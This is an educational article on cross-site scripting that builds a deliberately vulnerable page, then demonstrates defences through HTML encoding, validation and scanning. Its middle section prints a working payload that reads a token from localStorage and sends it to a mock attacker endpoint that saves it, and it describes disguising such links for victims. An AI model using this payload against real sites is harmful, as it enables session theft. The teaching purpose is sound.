XSS - or cross-site scripting - is one of the most common vulnerabilities in web applications. It has been on the OWASP Top 10 list (the list of the most critical security risks to web applications) for a while now. So let's figure out together how your browser can acquire and execute a script from a third-party website, and what this may lead to (spoiler: your cookies could get stolen, for example). And while we're at it, we'll talk about ways you can protect yourself from XSS.
What is XSS?
Cross-site scripting (XSS) is a way to attack web systems. An intruder embeds malicious code into a web page, and this code interacts with the intruder's server. The code is usually executed in a user's browser as the web page is rendered or, less frequently, after the user performs certain actions. Usually, all the intruder needs you to do is open a web page with the embedded malicious code, and the intruder can take advantage of the XSS vulnerability. This is one of the reasons why, as I am writing this article, XSS is number 7 on the 2017 OWASP Top 10 list (a list of the most dangerous vulnerabilities in web applications).
When rendering a web page, the browser cannot tell whether a piece of markup was written by the page's developer or came from data inserted into the page: anything that looks like HTML is treated as HTML. That's why the browser executes all JavaScript code inside the <script> tags it finds while rendering. This peculiarity is one of the main reasons why XSS attacks are possible.
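The point above can be illustrated with a small sketch. The renderGreeting helper and the sample inputs are hypothetical, and the code only builds strings, so it also runs outside a browser:

```javascript
// Hypothetical helper: builds an HTML fragment by plain string concatenation.
function renderGreeting(userInput) {
  return '<div>Hello, ' + userInput + '</div>';
}

// Ordinary text produces ordinary markup.
const harmless = renderGreeting('Alice');

// Text that contains a <script> element simply becomes part of the markup.
// A browser parsing this string cannot know that the tag came from user input.
const dangerous = renderGreeting('<script>alert(1)</script>');

console.log(harmless);
console.log(dangerous);
```

Both results are plain strings. The difference only shows up once a browser parses them as HTML.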
To conduct an XSS attack, one needs to do the following:
embed malicious code that interacts with the intruder's web server into a web page;
execute the embedded code as the page renders in the browser or as a user performs specific actions.
Now let's take a look at a sample XSS attack.
XSS attack example
Let's start at the beginning. How can one embed code into a web page? The first approach I can think of is to use the GET request parameters. Create a sample web page with the following logic:
if the GET request's xss parameter is empty, display the following message on the web page: Empty 'xss' parameter;
otherwise, show data from the xss parameter.
The page's code:
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<title>XSS Example</title>
</head>
<body>
<div style="text-align: center">Value of the 'xss' parameter: </div>
</body>
</html>
<script>
var urlParams = new URLSearchParams(window.location.search);
var xssParam = urlParams.get("xss");
var pageMessage = xssParam ? xssParam : "Empty 'xss' parameter";
document.write('<div style="text-align: center">'
+ pageMessage + '</div>');
</script>
Now check that everything works. Open the page with the xss parameter empty:
Assign the Not empty 'xss' parameter value to the xss parameter and open the page:
The page displays the strings correctly. And now to the interesting part! Pass the following string as the xss parameter: <script>alert("You've been hacked! This is an XSS attack!")</script>.
As you open the page, the code from the parameter is executed and you can see a dialog window with the text passed to the alert method:
Wow! The JavaScript code that you assigned to the xss parameter was executed as the page was rendered. This way, you've met half of the first condition that an XSS attack requires: you've embedded code that is executed as the page is rendered. However, the code did not do any harm.
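If you'd rather not type the encoded link by hand, it can be built in code. This is only a sketch: the address http://localhost:8080/xss.html is an assumption, so substitute wherever you serve the sample page.

```javascript
// Hypothetical address where the sample page is served; adjust to your setup.
const pageUrl = new URL('http://localhost:8080/xss.html');

const payload = '<script>alert("You\'ve been hacked! This is an XSS attack!")</script>';

// searchParams.set percent-encodes the value, so the markup survives inside the URL.
pageUrl.searchParams.set('xss', payload);
console.log(pageUrl.href);

// The page reads the parameter back in decoded form, exactly as it was passed.
const received = new URLSearchParams(pageUrl.search).get('xss');
console.log(received === payload); // true
```

The encoded link contains no angle brackets at all, which is part of why such links look harmless at first glance.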
Now you can link the embedded code to an intruder's web server. In my example, a web service written in C# mimics this web server. The code of the web service's endpoint is as follows:
[ApiController]
[Route("[controller]")]
public class AttackerEndPointController : ControllerBase
{
[HttpGet]
public IActionResult Get([FromQuery] string stolenToken)
{
var resultFilePath = Path.Combine(Directory.GetCurrentDirectory(),
"StolenTokenResult.txt");
System.IO.File.WriteAllText(resultFilePath, stolenToken);
return Ok();
}
}
To access this web service, pass the following string as the xss parameter:
"<script>
var xmlHttp = new XMLHttpRequest();
xmlHttp.open('GET',
'https://localhost:44394/AttackerEndPoint?stolenToken=TEST_TOKEN',
true);
xmlHttp.send(null);
</script>"
As the browser loads the page, the code from the parameter is executed. The GET request is sent to the indicated web service (https://localhost:44394/AttackerEndPoint) and the TEST_TOKEN string is passed as the stolenToken parameter. After getting the stolenToken parameter's value, the web service saves it to the StolenTokenResult.txt file.
You can test this behavior. Open the page. It displays nothing but the standard message - Value of the 'xss' parameter:.
However, in the developer tools, the 'Network' tab displays a message that a request to the https://localhost:44394/AttackerEndPoint web service has been sent:
Now check what's in the StolenTokenResult.txt file:
Okay, everything works. This way you've met nearly all XSS attack conditions:
some code is embedded into a web page through the GET request's xss parameter;
as the browser renders the page, this code is executed and interacts with a web service that has the following address https://localhost:44394/AttackerEndPoint.
All that's left is to make this code malicious. From the little experience I've had with web programming, I know that the browser sometimes stores user identification tokens for several websites or web applications. Here's how this works:
if a user's browser provides a required token from its local storage, the resource skips authentication and provides access to the user's account at once;
if the browser's local storage does not provide a token, the user has to be authenticated first.
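The two branches above can be sketched roughly as follows. The AUTH_TOKEN key, the resolveAccess function and the in-memory storage are all hypothetical. A real page would call localStorage directly; the stand-in is used so the sketch runs outside a browser.

```javascript
// In-memory stand-in for the browser's local storage (same getItem/setItem shape).
function createFakeStorage() {
  const items = new Map();
  return {
    getItem: (key) => (items.has(key) ? items.get(key) : null),
    setItem: (key, value) => items.set(key, String(value)),
  };
}

// Hypothetical client-side check: reuse a stored token or ask the user to log in.
function resolveAccess(storage) {
  const token = storage.getItem('AUTH_TOKEN');
  return token ? { action: 'open-account', token } : { action: 'show-login' };
}

const tokenStorage = createFakeStorage();
const before = resolveAccess(tokenStorage);           // no token yet
tokenStorage.setItem('AUTH_TOKEN', 'example-token');  // saved after a successful login
const after = resolveAccess(tokenStorage);            // token found, login skipped

console.log(before.action, after.action);
```

Any script running on the page can call getItem in the same way, which is what makes a stored token an attractive target.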
To make the code executed on the page malicious, I decided to change the page's code. Now when the page is opened, the USER_VERY_SECRET_TOKEN string is saved to the browser's local storage. The data is accessible via the SECRET_TOKEN key. This is the modified page code:
<!DOCTYPE html>
<html>
....
</html>
<script>
localStorage.setItem("SECRET_TOKEN", "USER_VERY_SECRET_TOKEN");
....
</script>
Now all that's left is to pass the malicious code as the xss parameter in the GET request. The code gets access to data in the local storage and sends it to the web service. To do this, I'll pass a string as the parameter:
"<script>
var xmlHttp = new XMLHttpRequest();
var userSecretToken = localStorage.getItem('SECRET_TOKEN');
var fullUrl = 'https://localhost:44394/AttackerEndPoint?stolenToken='
%2b userSecretToken;
xmlHttp.open('GET', fullUrl, true);
xmlHttp.send(null);
</script>"
In a URL query string, the '+' sign has a special role (it is decoded as a space), so I used its percent-encoded version instead: %2b.
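A quick way to see the difference is to parse two query strings with URLSearchParams, the same API the sample page uses. The values a and b are just placeholders:

```javascript
// A literal '+' in a query string is decoded as a space...
const withPlus = new URLSearchParams('xss=a+b').get('xss');

// ...while the percent-encoded form %2b is decoded as the '+' character.
const withEncodedPlus = new URLSearchParams('xss=a%2bb').get('xss');

console.log(JSON.stringify(withPlus));        // "a b"
console.log(JSON.stringify(withEncodedPlus)); // "a+b"

// encodeURIComponent produces the encoded form for you.
console.log(encodeURIComponent('a+b'));       // a%2Bb
```

With an unencoded '+', the script passed in the parameter would lose its concatenation operator and fail with a syntax error.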
Now you can check that everything works as expected. Open the web page:
Just as before, we can see only one message in the middle of the page: Value of the 'xss' parameter:. Now check that the code was executed, and the web service got a request where the stolenToken value was equal to USER_VERY_SECRET_TOKEN:
Most users wouldn't have noticed the script's execution when opening the page, because the page does not indicate it in any way.
Make sure that the web service got the stolen token:
Yes, it did! The stolenToken variable contains the USER_VERY_SECRET_TOKEN value, so the web service saved it to the StolenTokenResult.txt file. Congratulations, your XSS attack was successful.
In this example, I passed malicious code to a request directly, as a request parameter. In real life, intruders mask links that contain malicious code (for example, with a link-shortening app) and email them to a user (posing as a website's technical support manager or administrator), or publish them on a third-party website. By clicking the masked link, the user opens a web page and thus starts the malicious script in the browser without suspecting anything. Once the script has run, the attacker gets the token and can use it to access the user's account. This way the attacker can steal confidential data and perform malicious actions on behalf of the user.
After looking into XSS attacks and how they occur, let's dive into theory a bit and discuss types of XSS attacks:
reflected XSS. A malicious script arrives as part of a request (for example, in a query parameter), is embedded into the web page as text, and is executed when a user opens the page in a browser;
stored XSS. These are similar to reflected XSS. The main difference is that data with the malicious script is saved somehow (for example, through a form's fields on a page, query parameters or an SQL injection) and kept in a storage (a database, a file, etc). Then data from the storage is added straight to the page that the user sees, without encoding HTML characters. As a result, when a user opens the page, the malicious script is executed. This type of attack is especially dangerous because it potentially affects a group of users and not just one, for example, when a malicious script ends up on a forum's news page that anyone can view;
DOM-based XSS. Here the malicious script is embedded into the web page's DOM by code running in the browser, rather than into the page markup that the server returns. For example, someone adds a malicious script into a button click event handler on a web page. The code is executed when a user clicks that button.
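To make the stored variant more tangible, here is a minimal sketch. The comments array stands in for a database table, and the function names are hypothetical:

```javascript
// In-memory stand-in for a database table of forum comments (hypothetical).
const comments = [];

function saveComment(text) {
  comments.push(text); // stored exactly as submitted
}

// Vulnerable rendering: stored text is concatenated into markup without encoding.
function renderCommentsUnsafe() {
  return comments.map((c) => '<li>' + c + '</li>').join('');
}

saveComment('Nice article!');
saveComment('<script>/* attacker code */</script>');

// Every visitor who requests the page receives the same markup,
// including the script element that was saved earlier.
const pageHtml = renderCommentsUnsafe();
console.log(pageHtml);
```

Unlike the reflected case, nobody has to click a crafted link here: the payload is already part of the page for everyone who opens it.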
Considering the fact that this article's most likely reader is a developer, I should also talk about ways one can avoid making XSS vulnerabilities when writing code. Let's dive in.
Ways to prevent XSS vulnerabilities when developing
Since I am a C# developer, I'll review ways to secure your C# code against XSS attacks. However, discussing a particular language does not affect the general theory. Thus, the approaches I describe below apply to almost any programming language.
The first way you can secure your code from XSS vulnerabilities when developing is to use features of a web framework. For example, the ASP.NET framework lets you mix HTML markup and C# code in .cshtml and .razor files:
@page
@model ErrorModel
@{
ViewData["Title"] = "Error";
}
<h1 class="text-danger">Error.</h1>
<h2 class="text-danger">An error occurred while processing your request.</h2>
@if (Model.ShowRequestId)
{
<p>
<strong>Request ID:</strong> <code>@Model.RequestId</code>
</p>
}
This file displays the result of the Model.RequestId C# expression. For this file type to compile successfully, C# expressions or code blocks must start with the '@' character. However, this character does not just let you use C# alongside HTML markup in one file. It also directs ASP.NET to encode HTML characters into HTML entities when a code block or an expression returns a value. HTML entities are text fragments ("strings") that start with the ampersand character (&) and end with a semicolon (;). Entities are most often used to represent special characters (that could otherwise be interpreted as part of HTML code) or invisible characters (such as a non-breaking space). This way ASP.NET helps developers avoid creating XSS vulnerabilities.
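To show what encoding into HTML entities means in practice, here is a small JavaScript sketch. It is not what ASP.NET does internally (the framework's encoder may pick different entity forms). The HTML_ENTITIES table and the encodeHtmlEntities function are illustrative names only.

```javascript
// The five characters that can change the meaning of HTML markup,
// mapped to entities that a browser displays as plain text.
const HTML_ENTITIES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
};

function encodeHtmlEntities(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

const encoded = encodeHtmlEntities('<script>alert("XSS")</script>');
console.log(encoded);
// → &lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt;
```

After encoding, the string no longer contains a tag the browser could interpret, so it is shown to the user as ordinary text.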
However, developers need to pay special attention to files with the .aspx extension in ASP.NET (an older file format for HTML pages that support C# code). This file type does not automatically encode the results of C# expressions. To encode HTML characters returned by C# expressions in these files, place the C# code in the <%: %> code block. For example:
<asp:Content ID="BodyContent" ContentPlaceHolderID="MainContent" runat="server">
....
<h2><%: Title.Substring(1) %>.</h2>
....
</asp:Content>
The second option is to manually encode HTML characters into HTML entities before displaying data on the web page. Special encoder functions are used for this. .NET provides the following methods:
System.Web.HttpUtility.HtmlEncode(string);
System.Net.WebUtility.HtmlEncode(string);
System.Web.Security.AntiXss.AntiXssEncoder.HtmlEncode(string, bool);
System.Text.Encodings.Web.HtmlEncoder.Default.Encode(string).
Since HTML characters are encoded, the browser does not execute malicious code and just displays it on the web page. Encoded characters are displayed correctly.
Let me demonstrate this security approach on the XSS attack we created earlier. There is one problem though: I could not find a function in JavaScript that encodes HTML characters into HTML entities. However, on the Internet, I found a way to write such a function quickly and easily:
function htmlEncode (str)
{
var div = document.createElement('div');
div.appendChild(document.createTextNode(str));
return div.innerHTML;
}
This function relies on how the Element.innerHTML property works: text placed into a text node is serialized back with the characters &, < and > replaced by HTML entities. You can use this function on the HTML page from the XSS attack example:
<!DOCTYPE html>
<html>
....
</html>
<script>
function htmlEncode(str)
{
var div = document.createElement('div');
div.appendChild(document.createTextNode(str));
return div.innerHTML;
}
var urlParams = new URLSearchParams(window.location.search);
var xssParam = urlParams.get("xss");
var pageMessage = xssParam ? xssParam : "Empty 'xss' parameter";
var encodedMessage = htmlEncode(pageMessage); //<=
document.write('<div style="text-align: center">'
+ encodedMessage + '</div>');
</script>
Here we encode the xss parameter value with the help of the htmlEncode function before the value is displayed on the web page.
Now let's open this page and pass the following string as the xss parameter: <script>alert("You've been hacked! This is an XSS attack!")</script>:
As you can see, when a string that contains a script is encoded, the browser displays this string on the page and does not execute the script.
The third way to protect data is to validate data received from users or from an external source (an HTTP request, a database, a file, etc). For such scenarios, a good approach is to use regular expressions. You can use them to catch data that contains dangerous characters or expressions. When the validator detects such data, the application displays a warning and does not send the data for further processing.
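As a rough illustration of validation, the sketch below checks a user name against a regular expression. Note the swap: instead of searching for dangerous characters, it uses an allow-list that accepts only known-safe ones. The rule itself (1 to 32 letters, digits or underscores) and the names are assumptions made for the example.

```javascript
// Hypothetical rule: a user name is 1 to 32 letters, digits, or underscores.
const USER_NAME_PATTERN = /^[A-Za-z0-9_]{1,32}$/;

function validateUserName(input) {
  if (typeof input !== 'string' || !USER_NAME_PATTERN.test(input)) {
    // Rejected data is not passed on for further processing.
    return { ok: false, message: 'The user name contains unsupported characters.' };
  }
  return { ok: true, value: input };
}

console.log(validateUserName('alice_01').ok);                  // true
console.log(validateUserName('<script>alert(1)</script>').ok); // false
```

Validation complements encoding rather than replacing it: free-form fields such as comments can rarely be restricted to a narrow pattern, so their content still has to be encoded on output.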
To read about other ways to protect yourself from XSS, click here. As you can see from the example above, even the simplest web pages can have XSS vulnerabilities. Now imagine how many opportunities for XSS there are in projects that consist of tens of thousands of lines of code. With this in mind, automated tools that search for XSS vulnerabilities have been developed. These utilities scan the source code or access points of websites or web applications and produce a report about the vulnerabilities found.
Automated search of XSS vulnerabilities
If you did not pay much attention to protecting your project from XSS, not all is lost. Many XSS scanners have been developed to search websites and web applications for vulnerabilities. You can use them to find most known vulnerabilities in your projects (and not only in yours, because some scanners do not need access to source code). Such scanners can be free or paid. Of course, you can try to write your own XSS vulnerability detection tools, but they are likely to be less effective than paid tools.
The most logical and the cheapest way to look for vulnerabilities and fix them is to do this at early stages of development. XSS scanners and static code analyzers can help with this. For example, in the context of C# development, one of these static analyzers is PVS-Studio. PVS-Studio recently got a new diagnostic, V5610, which looks for potential XSS vulnerabilities. You can also use both types of tools, because each of them has its own area of responsibility. Thanks to these tools you can find existing vulnerabilities in your project, as well as possible future vulnerabilities.
If you are curious about the topic of vulnerabilities and want to know more about detecting them with a static analysis tool, I recommend reading the following article: OWASP, vulnerabilities, and taint analysis in PVS-Studio for C#. Stir, but don't shake.
Conclusion
XSS is an unusual and pretty nasty vulnerability in web security. In this article, I showed only one example of an XSS attack. In reality, there are many varieties of XSS attacks. Each project may have both unique and well-known XSS vulnerabilities that intruders may exploit. To find vulnerabilities in a finished project, or if you do not have access to a project's source code, think about using XSS scanners. To prevent XSS vulnerabilities during development, use static code analyzers.
P.S. To get a little bit of experience with XSS (for educational purposes), I suggest you try Google's game dedicated to XSS.